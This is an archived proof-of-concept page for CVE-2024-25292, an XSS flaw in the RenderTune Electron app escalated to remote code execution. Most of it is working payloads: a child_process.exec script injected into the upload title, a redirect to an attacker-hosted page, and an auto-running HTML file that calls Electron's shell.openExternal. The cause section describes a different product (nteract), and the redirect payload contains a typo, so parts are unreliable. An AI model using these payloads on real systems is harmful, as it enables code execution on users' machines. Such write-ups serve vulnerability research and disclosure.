Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-25292 PoC — RenderTune 安全漏洞

Source
https://github.com/EQSTLab/CVE-2024-25292
Associated Vulnerability
Title:RenderTune 安全漏洞 (CVE-2024-25292)
Description:RenderTune是一款适用于 Mac/Windows/Linux 的免费电子应用程序,它使用 ffmpeg 将音频+图像文件组合成视频文件。 RenderTune v1.1.4版本存在安全漏洞,该漏洞源于存在跨站脚本(XSS)漏洞。攻击者可利用该漏洞通过向Upload Title参数中注入特制的有效载荷来执行任意web脚本或HTML代码。
Description
PoC for CVE-2024-25292
Readme
# RenderTune RCE

A Proof-Of-Concept for CVE-2024-25292 vulnerability. <br><br>
A cross-site scripting (XSS) vulnerability in RenderTune v1.1.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Upload Title parameter.
In this repository there is an example vulnerable application and proof-of-concept (POC) exploit of it.

As a PoC there is a python file that automates the process. 
---------------------------------------

#### 1.Vunerability Overview:
It is a vulnerability that enables RCE through XSS.
There is an XSS capable part of the title, so it is a vulnerability that enables RCE through the syntax of NodeJS through the syntax of XSS.

---------------------------------------

#### 2. Vulnerability Cause:
* nteract 0.28.0 allows Electron webview via Markdown link, with resultant remote code execution (because nodeIntegration in webPreferences is true).
* Exploit explain
  * When generating links through MarkDown within the application, it creates a WebView via Electron, allowing external access to the link. Consequently, an attacker can achieve Remote Code Execution (RCE) by connecting to the link leading to the attacker's server.

Proof-of-concept (POC)
----------------------
###  Case 1) XSS to RCE.
Step 1) Confirm that XSS occurs in the title part
※ At this time, the Upload item will not be registered unless the image is attached
```html
<script>alert('JRURU')</script>
```
![renderTune1](https://github.com/QnA4u/CVE/assets/131337101/4f8e44e1-a80d-4d86-bea3-2e908dc2e35b)


Step 2) Therefore, it is configured to use XSS to execute NodeJS system commands.
```html
<script>require('child_process').exec('C:/Windows/System32/calc.exe')</script>
```
![renderTune2](https://github.com/QnA4u/CVE/assets/131337101/78fbccf5-3deb-4dd4-abfe-88ce0b30e448)

### Case 2) Attacks through an attacker server
※ When you attempt an attack using window.location, you automatically go to the page you set each time you run the app.
```html
<script>window.loaction='http://[attacker IP]/[PoC.html]'</script>
```
**Note:** ※ If you want to test it quickly, create a server on the attacker's PC with the following code.
``` bash
$ python -m http.server 80
```

* PoC Code
```html
<html>
<head>
  <title>jruru Link</title>
</head>
<body>

  <!-- Run scripts using on-click properties directly to the tag -->
  <a id="jruruLink" href="#" onclick="openExternal()">jruru Link</a>

  <script>
    // Script function definition
    function openExternal() {
      try {
        const { shell } = require('electron');
        shell.openExternal('file:C:/Windows/System32/calc.exe');
      } catch(e) {
        alert('JRURU');
        alert(e);
      }
    }

    // Run script automatically when loading pages
    document.addEventListener('DOMContentLoaded', function() {
      openExternal();
    });
  </script>
</body>
</html>
```
![renderTune3](https://github.com/QnA4u/CVE/assets/131337101/a2d26c2e-4004-45d2-8b63-36702087f597)

---------------------------------------
File Snapshot

 [4.0K]  /data/pocs/d0de67b5eeaeeb7d33b340869c06fdf3b8e04618
├── [ 643]  jruru.html
└── [3.0K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.